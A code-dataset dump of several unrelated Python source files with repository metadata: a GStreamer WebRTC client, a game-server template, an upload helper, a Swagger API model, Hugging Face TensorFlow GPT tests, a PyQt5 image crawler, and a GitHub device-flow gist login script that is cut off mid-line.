# print ('Received answer:\n%s' % sdp)
res, sdpmsg = GstSdp.SDPMessage.new()
GstSdp.sdp_message_parse_buffer(bytes(sdp.encode()), sdpmsg)
answer = GstWebRTC.WebRTCSessionDescription.new(GstWebRTC.WebRTCSDPType.ANSWER, sdpmsg)
promise = Gst.Promise.new()
self.webrtc.emit('set-remote-description', answer, promise)
promise.interrupt()
elif message['type'] == 'newIceCandidate':
ice = msg['data']
candidate = ice['candidate']
print(candidate)
sdpmlineindex = candidate['sdpMLineIndex']
self.webrtc.emit('add-ice-candidate', sdpmlineindex, candidate['candidate'])
async def loop(self):
assert self.conn
async for message in self.conn:
message = json.loads(message)
print(message['type'])
if message['type'] == 'ready':
self.start_pipeline()
else:
await self.handle_sdp(message)
return 0
def check_plugins():
needed = ["opus", "vpx", "nice", "webrtc", "dtls", "srtp", "rtp",
"rtpmanager", "videotestsrc", "audiotestsrc"]
missing = list(filter(lambda p: Gst.Registry.get().find_plugin(p) is None, needed))
if len(missing):
print('Missing gstreamer plugins:', missing)
return False
return True
if __name__=='__main__':
Gst.init(None)
if not check_plugins():
sys.exit(1)
parser = argparse.ArgumentParser()
parser.add_argument('peerid', help='String ID of the peer to connect to')
parser.add_argument('--server', help='Signalling server to connect to, eg "wss://127.0.0.1:8443"')
args = parser.parse_args()
our_id = random.randrange(10, 10000)
c = WebRTCClient(our_id, args.peerid, args.server)
asyncio.get_event_loop().run_until_complete(c.connect())
res = asyncio.get_event_loop().run_until_complete(c.loop())
sys.exit(res)
| 36.901099
| 129
| 0.625968
|
be53589ba3eba1da3b9f895fd6ecfd64fd76a9da
| 451
|
py
|
Python
|
data/scripts/templates/object/tangible/lair/bol/shared_lair_bol_grassland.py
|
obi-two/GameServer
|
7d37024e2291a97d49522610cd8f1dbe5666afc2
|
[
"MIT"
] | 20
|
2015-02-23T15:11:56.000Z
|
2022-03-18T20:56:48.000Z
|
data/scripts/templates/object/tangible/lair/bol/shared_lair_bol_grassland.py
|
apathyboy/swganh
|
665128efe9154611dec4cb5efc61d246dd095984
|
[
"MIT"
] | null | null | null |
data/scripts/templates/object/tangible/lair/bol/shared_lair_bol_grassland.py
|
apathyboy/swganh
|
665128efe9154611dec4cb5efc61d246dd095984
|
[
"MIT"
] | 20
|
2015-04-04T16:35:59.000Z
|
2022-03-24T14:54:37.000Z
|
#### NOTICE: THIS FILE IS AUTOGENERATED
#### MODIFICATIONS MAY BE LOST IF DONE IMPROPERLY
#### PLEASE SEE THE ONLINE DOCUMENTATION FOR EXAMPLES
from swgpy.object import *
def create(kernel):
result = Tangible()
result.template = "object/tangible/lair/bol/shared_lair_bol_grassland.iff"
result.attribute_template_id = -1
result.stfName("lair_n","bol_grassland")
#### BEGIN MODIFICATIONS ####
#### END MODIFICATIONS ####
return result
| 26.529412
| 75
| 0.727273
|
8753534109c83b44dc8f21c9d0d2f0932f760144
| 1,780
|
py
|
Python
|
biliup/engine/upload.py
|
DingKuiqing/bilibiliupload
|
7fa66ece796859219b2119edfc7e6838fd7c4bfa
|
[
"MIT"
] | 1
|
2021-08-15T07:27:57.000Z
|
2021-08-15T07:27:57.000Z
|
biliup/engine/upload.py
|
yzydlc/bilibiliupload
|
89428db415f55c63d6431f320ed3c83c3481448f
|
[
"MIT"
] | null | null | null |
biliup/engine/upload.py
|
yzydlc/bilibiliupload
|
89428db415f55c63d6431f320ed3c83c3481448f
|
[
"MIT"
] | null | null | null |
import logging
import os
logger = logging.getLogger('biliup')
class UploadBase:
def __init__(self, principal, data, persistence_path=None):
self.principal = principal
self.persistence_path = persistence_path
self.data = data
# @property
@staticmethod
def file_list(index):
file_list = []
for file_name in os.listdir('.'):
if index in file_name:
file_list.append(file_name)
file_list = sorted(file_list)
return file_list
@staticmethod
def remove_filelist(file_list):
for r in file_list:
os.remove(r)
logger.info('删除-' + r)
@staticmethod
def filter_file(index):
file_list = UploadBase.file_list(index)
if len(file_list) == 0:
return False
for r in file_list:
file_size = os.path.getsize(r) / 1024 / 1024 / 1024
if file_size <= 0.02:
os.remove(r)
logger.info('过滤删除-' + r)
file_list = UploadBase.file_list(index)
if len(file_list) == 0:
logger.info('视频过滤后无文件可传')
return False
for f in file_list:
if f.endswith('.part'):
os.rename(f, os.path.splitext(f)[0])
logger.info('%s存在已更名' % f)
return True
def upload(self, file_list):
raise NotImplementedError()
def start(self):
if self.filter_file(self.principal):
logger.info('准备上传' + self.data["format_title"])
needed2process = self.upload(UploadBase.file_list(self.principal))
self.postprocessor(needed2process)
def postprocessor(self, data):
# data = file_list
if data:
self.remove_filelist(data)
| 28.709677
| 78
| 0.574157
|
d458617b924ccd4e62e9bf591893230723efd0e6
| 13,123
|
py
|
Python
|
third_party/saltedge/swagger_client/models/report.py
|
ltowarek/budget-supervisor
|
862a2d720aecd4ad2fded9c63bc839190ebbc77e
|
[
"MIT"
] | 1
|
2022-03-01T10:28:31.000Z
|
2022-03-01T10:28:31.000Z
|
third_party/saltedge/swagger_client/models/report.py
|
ltowarek/budget-supervisor
|
862a2d720aecd4ad2fded9c63bc839190ebbc77e
|
[
"MIT"
] | 75
|
2020-11-07T20:14:55.000Z
|
2021-10-05T15:08:22.000Z
|
third_party/saltedge/swagger_client/models/report.py
|
ltowarek/budget-supervisor
|
862a2d720aecd4ad2fded9c63bc839190ebbc77e
|
[
"MIT"
] | null | null | null |
# coding: utf-8
"""
Salt Edge Account Information API
API Reference for services # noqa: E501
OpenAPI spec version: 5.0.0
Contact: support@saltedge.com
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re # noqa: F401
import six
class Report(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'result': 'ReportResult',
'customer_id': 'int',
'connection_ids': 'list[str]',
'connections': 'list[ReportConnections]',
'currency_code': 'str',
'exchange_rates': 'object',
'report_id': 'int',
'report_types': 'list[str]',
'status': 'str',
'from_date': 'date',
'to_date': 'date'
}
attribute_map = {
'result': 'result',
'customer_id': 'customer_id',
'connection_ids': 'connection_ids',
'connections': 'connections',
'currency_code': 'currency_code',
'exchange_rates': 'exchange_rates',
'report_id': 'report_id',
'report_types': 'report_types',
'status': 'status',
'from_date': 'from_date',
'to_date': 'to_date'
}
def __init__(self, result=None, customer_id=None, connection_ids=None, connections=None, currency_code=None, exchange_rates=None, report_id=None, report_types=None, status=None, from_date=None, to_date=None): # noqa: E501
"""Report - a model defined in Swagger""" # noqa: E501
self._result = None
self._customer_id = None
self._connection_ids = None
self._connections = None
self._currency_code = None
self._exchange_rates = None
self._report_id = None
self._report_types = None
self._status = None
self._from_date = None
self._to_date = None
self.discriminator = None
self.result = result
self.customer_id = customer_id
self.connection_ids = connection_ids
self.connections = connections
self.currency_code = currency_code
self.exchange_rates = exchange_rates
self.report_id = report_id
self.report_types = report_types
self.status = status
self.from_date = from_date
self.to_date = to_date
@property
def result(self):
"""Gets the result of this Report. # noqa: E501
:return: The result of this Report. # noqa: E501
:rtype: ReportResult
"""
return self._result
@result.setter
def result(self, result):
"""Sets the result of this Report.
:param result: The result of this Report. # noqa: E501
:type: ReportResult
"""
if result is None:
raise ValueError("Invalid value for `result`, must not be `None`") # noqa: E501
self._result = result
@property
def customer_id(self):
"""Gets the customer_id of this Report. # noqa: E501
The `id` of the [customer](#customers) # noqa: E501
:return: The customer_id of this Report. # noqa: E501
:rtype: int
"""
return self._customer_id
@customer_id.setter
def customer_id(self, customer_id):
"""Sets the customer_id of this Report.
The `id` of the [customer](#customers) # noqa: E501
:param customer_id: The customer_id of this Report. # noqa: E501
:type: int
"""
if customer_id is None:
raise ValueError("Invalid value for `customer_id`, must not be `None`") # noqa: E501
self._customer_id = customer_id
@property
def connection_ids(self):
"""Gets the connection_ids of this Report. # noqa: E501
`ids` of [Connections](#connections) included in report # noqa: E501
:return: The connection_ids of this Report. # noqa: E501
:rtype: list[str]
"""
return self._connection_ids
@connection_ids.setter
def connection_ids(self, connection_ids):
"""Sets the connection_ids of this Report.
`ids` of [Connections](#connections) included in report # noqa: E501
:param connection_ids: The connection_ids of this Report. # noqa: E501
:type: list[str]
"""
if connection_ids is None:
raise ValueError("Invalid value for `connection_ids`, must not be `None`") # noqa: E501
self._connection_ids = connection_ids
@property
def connections(self):
"""Gets the connections of this Report. # noqa: E501
information related to connections included in report # noqa: E501
:return: The connections of this Report. # noqa: E501
:rtype: list[ReportConnections]
"""
return self._connections
@connections.setter
def connections(self, connections):
"""Sets the connections of this Report.
information related to connections included in report # noqa: E501
:param connections: The connections of this Report. # noqa: E501
:type: list[ReportConnections]
"""
if connections is None:
raise ValueError("Invalid value for `connections`, must not be `None`") # noqa: E501
self._connections = connections
@property
def currency_code(self):
"""Gets the currency_code of this Report. # noqa: E501
main [currency code](#currencies) used for report's generation and value conversion # noqa: E501
:return: The currency_code of this Report. # noqa: E501
:rtype: str
"""
return self._currency_code
@currency_code.setter
def currency_code(self, currency_code):
"""Sets the currency_code of this Report.
main [currency code](#currencies) used for report's generation and value conversion # noqa: E501
:param currency_code: The currency_code of this Report. # noqa: E501
:type: str
"""
if currency_code is None:
raise ValueError("Invalid value for `currency_code`, must not be `None`") # noqa: E501
self._currency_code = currency_code
@property
def exchange_rates(self):
"""Gets the exchange_rates of this Report. # noqa: E501
a list of exchange rates at the time of report creation # noqa: E501
:return: The exchange_rates of this Report. # noqa: E501
:rtype: object
"""
return self._exchange_rates
@exchange_rates.setter
def exchange_rates(self, exchange_rates):
"""Sets the exchange_rates of this Report.
a list of exchange rates at the time of report creation # noqa: E501
:param exchange_rates: The exchange_rates of this Report. # noqa: E501
:type: object
"""
if exchange_rates is None:
raise ValueError("Invalid value for `exchange_rates`, must not be `None`") # noqa: E501
self._exchange_rates = exchange_rates
@property
def report_id(self):
"""Gets the report_id of this Report. # noqa: E501
the `id` of the generated report # noqa: E501
:return: The report_id of this Report. # noqa: E501
:rtype: int
"""
return self._report_id
@report_id.setter
def report_id(self, report_id):
"""Sets the report_id of this Report.
the `id` of the generated report # noqa: E501
:param report_id: The report_id of this Report. # noqa: E501
:type: int
"""
if report_id is None:
raise ValueError("Invalid value for `report_id`, must not be `None`") # noqa: E501
self._report_id = report_id
@property
def report_types(self):
"""Gets the report_types of this Report. # noqa: E501
types of generated reports. # noqa: E501
:return: The report_types of this Report. # noqa: E501
:rtype: list[str]
"""
return self._report_types
@report_types.setter
def report_types(self, report_types):
"""Sets the report_types of this Report.
types of generated reports. # noqa: E501
:param report_types: The report_types of this Report. # noqa: E501
:type: list[str]
"""
if report_types is None:
raise ValueError("Invalid value for `report_types`, must not be `None`") # noqa: E501
allowed_values = ["balance", "expense", "income", "savings"] # noqa: E501
if not set(report_types).issubset(set(allowed_values)):
raise ValueError(
"Invalid values for `report_types` [{0}], must be a subset of [{1}]" # noqa: E501
.format(", ".join(map(str, set(report_types) - set(allowed_values))), # noqa: E501
", ".join(map(str, allowed_values)))
)
self._report_types = report_types
@property
def status(self):
"""Gets the status of this Report. # noqa: E501
current report's status. # noqa: E501
:return: The status of this Report. # noqa: E501
:rtype: str
"""
return self._status
@status.setter
def status(self, status):
"""Sets the status of this Report.
current report's status. # noqa: E501
:param status: The status of this Report. # noqa: E501
:type: str
"""
if status is None:
raise ValueError("Invalid value for `status`, must not be `None`") # noqa: E501
allowed_values = ["initialized", "calculating", "success", "failed"] # noqa: E501
if status not in allowed_values:
raise ValueError(
"Invalid value for `status` ({0}), must be one of {1}" # noqa: E501
.format(status, allowed_values)
)
self._status = status
@property
def from_date(self):
"""Gets the from_date of this Report. # noqa: E501
the date from which the data in the report are included # noqa: E501
:return: The from_date of this Report. # noqa: E501
:rtype: date
"""
return self._from_date
@from_date.setter
def from_date(self, from_date):
"""Sets the from_date of this Report.
the date from which the data in the report are included # noqa: E501
:param from_date: The from_date of this Report. # noqa: E501
:type: date
"""
if from_date is None:
raise ValueError("Invalid value for `from_date`, must not be `None`") # noqa: E501
self._from_date = from_date
@property
def to_date(self):
"""Gets the to_date of this Report. # noqa: E501
the date to which the data in the report are included # noqa: E501
:return: The to_date of this Report. # noqa: E501
:rtype: date
"""
return self._to_date
@to_date.setter
def to_date(self, to_date):
"""Sets the to_date of this Report.
the date to which the data in the report are included # noqa: E501
:param to_date: The to_date of this Report. # noqa: E501
:type: date
"""
if to_date is None:
raise ValueError("Invalid value for `to_date`, must not be `None`") # noqa: E501
self._to_date = to_date
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
if issubclass(Report, dict):
for key, value in self.items():
result[key] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, Report):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
| 31.621687
| 226
| 0.592243
|
8d8c21835a9c4da45bdec445ad5ccfd3e8eace76
| 10,826
|
py
|
Python
|
tests/test_modeling_tf_openai.py
|
christy-yuan-li/transformers-1
|
2ee9f9b69e67426aaed690f652f9cdd8b524b99d
|
[
"Apache-2.0"
] | null | null | null |
tests/test_modeling_tf_openai.py
|
christy-yuan-li/transformers-1
|
2ee9f9b69e67426aaed690f652f9cdd8b524b99d
|
[
"Apache-2.0"
] | null | null | null |
tests/test_modeling_tf_openai.py
|
christy-yuan-li/transformers-1
|
2ee9f9b69e67426aaed690f652f9cdd8b524b99d
|
[
"Apache-2.0"
] | null | null | null |
# coding=utf-8
# Copyright 2020 The HuggingFace Team. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
from transformers import OpenAIGPTConfig, is_tf_available
from transformers.testing_utils import require_tf, slow
from .test_configuration_common import ConfigTester
from .test_modeling_tf_common import TFModelTesterMixin, ids_tensor
if is_tf_available():
import tensorflow as tf
from transformers.models.openai.modeling_tf_openai import (
TF_OPENAI_GPT_PRETRAINED_MODEL_ARCHIVE_LIST,
TFOpenAIGPTDoubleHeadsModel,
TFOpenAIGPTForSequenceClassification,
TFOpenAIGPTLMHeadModel,
TFOpenAIGPTModel,
)
class TFOpenAIGPTModelTester:
def __init__(
self,
parent,
):
self.parent = parent
self.batch_size = 13
self.seq_length = 7
self.is_training = True
self.use_token_type_ids = True
self.use_input_mask = True
self.use_labels = True
self.use_mc_token_ids = True
self.vocab_size = 99
self.hidden_size = 32
self.num_hidden_layers = 5
self.num_attention_heads = 4
self.intermediate_size = 37
self.hidden_act = "gelu"
self.hidden_dropout_prob = 0.1
self.attention_probs_dropout_prob = 0.1
self.max_position_embeddings = 512
self.type_vocab_size = 16
self.type_sequence_label_size = 2
self.initializer_range = 0.02
self.num_labels = 3
self.num_choices = 4
self.scope = None
self.pad_token_id = self.vocab_size - 1
def prepare_config_and_inputs(self):
input_ids = ids_tensor([self.batch_size, self.seq_length], self.vocab_size)
input_mask = None
if self.use_input_mask:
input_mask = ids_tensor([self.batch_size, self.seq_length], vocab_size=2)
token_type_ids = None
if self.use_token_type_ids:
token_type_ids = ids_tensor([self.batch_size, self.seq_length], self.type_vocab_size)
mc_token_ids = None
if self.use_mc_token_ids:
mc_token_ids = ids_tensor([self.batch_size, self.num_choices], self.seq_length)
sequence_labels = None
token_labels = None
choice_labels = None
if self.use_labels:
sequence_labels = ids_tensor([self.batch_size], self.type_sequence_label_size)
token_labels = ids_tensor([self.batch_size, self.seq_length], self.num_labels)
choice_labels = ids_tensor([self.batch_size], self.num_choices)
config = OpenAIGPTConfig(
vocab_size=self.vocab_size,
n_embd=self.hidden_size,
n_layer=self.num_hidden_layers,
n_head=self.num_attention_heads,
# intermediate_size=self.intermediate_size,
# hidden_act=self.hidden_act,
# hidden_dropout_prob=self.hidden_dropout_prob,
# attention_probs_dropout_prob=self.attention_probs_dropout_prob,
n_positions=self.max_position_embeddings,
n_ctx=self.max_position_embeddings,
# type_vocab_size=self.type_vocab_size,
# initializer_range=self.initializer_range,
pad_token_id=self.pad_token_id,
)
head_mask = ids_tensor([self.num_hidden_layers, self.num_attention_heads], 2)
return (
config,
input_ids,
input_mask,
head_mask,
token_type_ids,
mc_token_ids,
sequence_labels,
token_labels,
choice_labels,
)
def create_and_check_openai_gpt_model(self, config, input_ids, input_mask, head_mask, token_type_ids, *args):
model = TFOpenAIGPTModel(config=config)
inputs = {"input_ids": input_ids, "attention_mask": input_mask, "token_type_ids": token_type_ids}
result = model(inputs)
inputs = [input_ids, input_mask]
result = model(inputs)
result = model(input_ids)
self.parent.assertEqual(result.last_hidden_state.shape, (self.batch_size, self.seq_length, self.hidden_size))
def create_and_check_openai_gpt_lm_head(self, config, input_ids, input_mask, head_mask, token_type_ids, *args):
model = TFOpenAIGPTLMHeadModel(config=config)
inputs = {"input_ids": input_ids, "attention_mask": input_mask, "token_type_ids": token_type_ids}
result = model(inputs)
self.parent.assertEqual(result.logits.shape, (self.batch_size, self.seq_length, self.vocab_size))
def create_and_check_openai_gpt_double_head(
self, config, input_ids, input_mask, head_mask, token_type_ids, mc_token_ids, *args
):
model = TFOpenAIGPTDoubleHeadsModel(config=config)
multiple_choice_inputs_ids = tf.tile(tf.expand_dims(input_ids, 1), (1, self.num_choices, 1))
multiple_choice_input_mask = tf.tile(tf.expand_dims(input_mask, 1), (1, self.num_choices, 1))
multiple_choice_token_type_ids = tf.tile(tf.expand_dims(token_type_ids, 1), (1, self.num_choices, 1))
inputs = {
"input_ids": multiple_choice_inputs_ids,
"mc_token_ids": mc_token_ids,
"attention_mask": multiple_choice_input_mask,
"token_type_ids": multiple_choice_token_type_ids,
}
result = model(inputs)
self.parent.assertEqual(
result.logits.shape, (self.batch_size, self.num_choices, self.seq_length, self.vocab_size)
)
self.parent.assertEqual(result.mc_logits.shape, (self.batch_size, self.num_choices))
def create_and_check_openai_gpt_for_sequence_classification(
self, config, input_ids, input_mask, head_mask, token_type_ids, *args
):
config.num_labels = self.num_labels
sequence_labels = ids_tensor([self.batch_size], self.type_sequence_label_size)
inputs = {
"input_ids": input_ids,
"attention_mask": input_mask,
"token_type_ids": token_type_ids,
"labels": sequence_labels,
}
model = TFOpenAIGPTForSequenceClassification(config)
result = model(inputs)
self.parent.assertEqual(result.logits.shape, (self.batch_size, self.num_labels))
def prepare_config_and_inputs_for_common(self):
config_and_inputs = self.prepare_config_and_inputs()
(
config,
input_ids,
input_mask,
head_mask,
token_type_ids,
mc_token_ids,
sequence_labels,
token_labels,
choice_labels,
) = config_and_inputs
inputs_dict = {"input_ids": input_ids, "token_type_ids": token_type_ids, "attention_mask": input_mask}
return config, inputs_dict
@require_tf
class TFOpenAIGPTModelTest(TFModelTesterMixin, unittest.TestCase):
all_model_classes = (
(TFOpenAIGPTModel, TFOpenAIGPTLMHeadModel, TFOpenAIGPTDoubleHeadsModel, TFOpenAIGPTForSequenceClassification)
if is_tf_available()
else ()
)
all_generative_model_classes = (
(TFOpenAIGPTLMHeadModel,) if is_tf_available() else ()
) # TODO (PVP): Add Double HeadsModel when generate() function is changed accordingly
test_head_masking = False
def setUp(self):
self.model_tester = TFOpenAIGPTModelTester(self)
self.config_tester = ConfigTester(self, config_class=OpenAIGPTConfig, n_embd=37)
def test_config(self):
self.config_tester.run_common_tests()
def test_openai_gpt_model(self):
config_and_inputs = self.model_tester.prepare_config_and_inputs()
self.model_tester.create_and_check_openai_gpt_model(*config_and_inputs)
def test_openai_gpt_lm_head(self):
config_and_inputs = self.model_tester.prepare_config_and_inputs()
self.model_tester.create_and_check_openai_gpt_lm_head(*config_and_inputs)
def test_openai_gpt_double_head(self):
config_and_inputs = self.model_tester.prepare_config_and_inputs()
self.model_tester.create_and_check_openai_gpt_double_head(*config_and_inputs)
def test_model_common_attributes(self):
config, inputs_dict = self.model_tester.prepare_config_and_inputs_for_common()
for model_class in self.all_model_classes:
model = model_class(config)
assert isinstance(model.get_input_embeddings(), tf.keras.layers.Layer)
if model_class in self.all_generative_model_classes:
x = model.get_output_embeddings()
assert isinstance(x, tf.keras.layers.Layer)
name = model.get_bias()
assert name is None
else:
x = model.get_output_embeddings()
assert x is None
name = model.get_bias()
assert name is None
def test_openai_gpt_sequence_classification_model(self):
config_and_inputs = self.model_tester.prepare_config_and_inputs()
self.model_tester.create_and_check_openai_gpt_for_sequence_classification(*config_and_inputs)
def test_mixed_precision(self):
# TODO JP: Make OpenAIGPT float16 compliant
pass
@slow
def test_model_from_pretrained(self):
for model_name in TF_OPENAI_GPT_PRETRAINED_MODEL_ARCHIVE_LIST[:1]:
model = TFOpenAIGPTModel.from_pretrained(model_name)
self.assertIsNotNone(model)
@require_tf
class TFOPENAIGPTModelLanguageGenerationTest(unittest.TestCase):
@slow
def test_lm_generate_openai_gpt(self):
model = TFOpenAIGPTLMHeadModel.from_pretrained("openai-gpt")
input_ids = tf.convert_to_tensor([[481, 4735, 544]], dtype=tf.int32) # the president is
expected_output_ids = [
481,
4735,
544,
246,
963,
870,
762,
239,
244,
40477,
244,
249,
719,
881,
487,
544,
240,
244,
603,
481,
] # the president is a very good man. " \n " i\'m sure he is, " said the
output_ids = model.generate(input_ids, do_sample=False)
self.assertListEqual(output_ids[0].numpy().tolist(), expected_output_ids)
| 37.331034
| 117
| 0.669315
|
3515e554c0e1de4d081f0f0894607b26c1ada925
| 6,434
|
py
|
Python
|
crawer.py
|
code-aifarmer/Image-crawling-program-developed-based-on-PyQt5
|
6a897f958f3b82fbcf124722098110d59f76c608
|
[
"MIT"
] | 2
|
2021-01-20T16:30:25.000Z
|
2021-05-20T15:09:22.000Z
|
crawer.py
|
code-aifarmer/Image-crawling-program-developed-based-on-PyQt5
|
6a897f958f3b82fbcf124722098110d59f76c608
|
[
"MIT"
] | null | null | null |
crawer.py
|
code-aifarmer/Image-crawling-program-developed-based-on-PyQt5
|
6a897f958f3b82fbcf124722098110d59f76c608
|
[
"MIT"
] | 2
|
2021-01-22T04:21:07.000Z
|
2021-05-20T15:09:26.000Z
|
# -*- coding: utf-8 -*-
from ui_mainwindow import Ui_MainWindow
import utils
from PyQt5.Qt import *
from PyQt5.QtTest import QTest
from threading import Thread
import shlex
import os
from tkinter import messagebox
import image_downloader
from logger import logger
# class DialogAbout(QDialog, Ui_Dialog_about):
# def __init__(self):
# QDialog.__init__(self)
# self.setupUi(self)
class MainWindow(QMainWindow, Ui_MainWindow):
def __init__(self):
logger.log_hooks.append(self.log)
self.log_queue = []
QMainWindow.__init__(self)
self.setupUi(self)
# self.dialog_about = DialogAbout()
self.state = "stop"
self.elapsed_timer = QElapsedTimer()
self.update_timer = QTimer()
self.update_timer.setInterval(100)
self.update_timer.timeout.connect(self.update_elapsed_time)
self.process_log_timer = QTimer()
self.process_log_timer.setInterval(100)
self.process_log_timer.timeout.connect(self.progress_log)
self.process_log_timer.start()
self.pushButton_load_file.clicked.connect(
lambda: self.lineEdit_path2file.setText(QFileDialog.getOpenFileName(
self, "Load keywords from file", "./", "Text files (*.txt)")[0]))
self.pushButton_output.clicked.connect(
lambda: self.lineEdit_output.setText(QFileDialog.getExistingDirectory(
self, "Set output directory", "./")))
self.pushButton_start.clicked.connect(self.start_download)
self.pushButton_cancel.clicked.connect(self.cancel_download)
def log(self, text):
if text.strip(" \n") == "":
return
self.log_queue.append(text)
def progress_log(self):
while len(self.log_queue) > 0:
log_str = self.log_queue.pop(0)
if log_str.startswith("=="):
self.progressBar_current.setMaximum(int(log_str.split()[1]))
if log_str.startswith("##"):
self.progressBar_current.setValue(
self.progressBar_current.value() + 1)
log_str = "[" + QTime.currentTime().toString() + "] " + log_str
self.plainTextEdit_log.appendPlainText(log_str)
def reset_ui(self):
self.progressBar_current.setFormat("")
self.progressBar_current.reset()
self.progressBar_total.setFormat("")
self.progressBar_total.reset()
self.label_time_elapsed.setText("00:00:00")
self.plainTextEdit_log.clear()
def update_elapsed_time(self):
elapsed_total = self.elapsed_timer.elapsed() / 1000
elapsed_hour = elapsed_total / 3600
elapsed_minutes = (elapsed_total % 3600) / 60
elapsed_secs = elapsed_total % 60
str_elapsed_time = "%02d:%02d:%02d" % (
elapsed_hour, elapsed_minutes, elapsed_secs)
self.label_time_elapsed.setText(str_elapsed_time)
def gen_config_from_ui(self):
config = utils.AppConfig()
""" Driver """
if self.radioButton_chrome_headless.isChecked():
config.driver = "chrome_headless"
""" Output directory """
config.output_dir = self.lineEdit_output.text()
""" Switches """
config.face_only = self.checkBox_face_only.isChecked()
config.safe_mode = self.checkBox_safe_mode.isChecked()
""" Numbers """
config.max_number = self.spinBox_max_number.value()
config.num_threads = self.spinBox_num_threads.value()
""" Keywords List """
if self.checkBox_from_file.isChecked():
keywords_list = ''
str_path = ''
str_path = self.lineEdit_path2file.text()
#str_path = self.lineEdit_keywords.text()
if len(str_path) == 0:
messagebox.showinfo("提示", "请完成文件读入功能")
self.close()
else:
keywords_list = utils.gen_keywords_list_from_file(str_path)
else:
# str_keywords = self.lineEdit_path2file.text()
str_keywords = self.lineEdit_keywords.text()
keywords_list = utils.gen_keywords_list_from_str(str_keywords)
return config, keywords_list
def start_download(self):
if self.checkBox_from_file.isChecked() and self.lineEdit_path2file.text() == "" \
or not self.checkBox_from_file.isChecked() and self.lineEdit_keywords.text() == "":
print("Keywords is empty!")
self.lineEdit_keywords.setFocus()
return
if self.lineEdit_output.text() == "":
print("Output directory is empty!")
self.lineEdit_output.setFocus()
return
self.state = "run"
self.pushButton_start.setEnabled(False)
self.pushButton_cancel.setEnabled(True)
config, keywords_list = self.gen_config_from_ui()
self.elapsed_timer.restart()
self.update_timer.start()
self.reset_ui()
num_keywords = len(keywords_list)
self.progressBar_total.setMaximum(num_keywords)
self.progressBar_total.setFormat("%p%, %v/%m")
self.progressBar_total.setValue(0)
for index in range(num_keywords):
if self.state != "run":
break
keywords = keywords_list[index].strip()
if keywords == "":
continue
config.keywords = keywords
str_paras = config.to_command_paras()
print(str_paras)
self.progressBar_current.setMaximum(config.max_number)
self.progressBar_current.setValue(0)
self.progressBar_current.setFormat(keywords + ", %p%, %v/%m")
thread_download = Thread(target=image_downloader.main, args=[
shlex.split(str_paras)])
thread_download.start()
while thread_download.is_alive():
QTest.qWait(1000)
if self.isHidden():
os._exit(0)
self.progressBar_total.setValue(index + 1)
if self.state == "run":
self.state = "stop"
self.pushButton_cancel.setEnabled(False)
self.pushButton_start.setEnabled(True)
self.update_timer.stop()
print("stopped")
pass
def cancel_download(self):
self.state = "stop"
self.pushButton_cancel.setEnabled(False)
pass
| 32.826531
| 99
| 0.617345
|
8d7294bb7a717ca92590937bf21dec0a3ba356e0
| 156
|
py
|
Python
|
arch_elements/model_def/__init__.py
|
martsec/arcitectural_elements_identifier
|
87607e87f714443c5aa37c96896b76a4f6f424d4
|
[
"AAL"
] | null | null | null |
arch_elements/model_def/__init__.py
|
martsec/arcitectural_elements_identifier
|
87607e87f714443c5aa37c96896b76a4f6f424d4
|
[
"AAL"
] | null | null | null |
arch_elements/model_def/__init__.py
|
martsec/arcitectural_elements_identifier
|
87607e87f714443c5aa37c96896b76a4f6f424d4
|
[
"AAL"
] | null | null | null |
from .mobilenet import Mobilenet
from .cnn import CNN
from .svm import SVMClassifier
__all__ = [
"Mobilenet",
"CNN",
"SVMClassifier",
]
| 17.333333
| 33
| 0.653846
|
60573010333516771d53c2e0c6a36c55e4898b93
| 1,762
|
py
|
Python
|
pygisty/gisty/headless.py
|
BlyatManGopnik/pygisty
|
e9ba1b41e6c873cf3ce7bb449d119669940a767b
|
[
"MIT"
] | 1
|
2022-03-26T06:46:01.000Z
|
2022-03-26T06:46:01.000Z
|
pygisty/gisty/headless.py
|
Amedlio/pygisty
|
dfb7f624b3bba0a3972bd01eac297dcb23e17181
|
[
"MIT"
] | 1
|
2022-03-26T08:10:34.000Z
|
2022-03-26T08:12:15.000Z
|
pygisty/gisty/headless.py
|
Amedlio/pygisty
|
dfb7f624b3bba0a3972bd01eac297dcb23e17181
|
[
"MIT"
] | 1
|
2022-03-26T06:30:40.000Z
|
2022-03-26T06:30:40.000Z
|
import requests
import json
import time
def headless(clientid, configdir):
global authtoken
global headlessdone
global devicecode
headlessdone = False
print(clientid)
print("Starting headless GitHub authentication")
pog = {"client_id": clientid, "scope": "gist"}
header = {'User-Agent': "pygisty", "Accept": "application/json"}
r = requests.Session()
r.params.update(pog)
r.headers.update(header)
request = r.post('https://github.com/login/device/code')
body = request.text
dat = json.loads(body)
try:
error = dat["error"]
print("Error: " + error)
print(request.url)
except KeyError:
devicecode = dat["device_code"]
print("I just received a code that you should enter at https://github.com/login/device\nCode: " + dat[
"user_code"])
while headlessdone == False:
try:
poggers = {"client_id": clientid, "device_code": devicecode,
"grant_type": "urn:ietf:params:oauth:grant-type:device_code"}
s = requests.Session()
s.params.update(poggers)
s.headers.update(header)
pogchamp = s.post("https://github.com/login/oauth/access_token")
data = json.loads(pogchamp.text)
authtoken = data["access_token"]
print("We got the auth token!")
accessjson = {
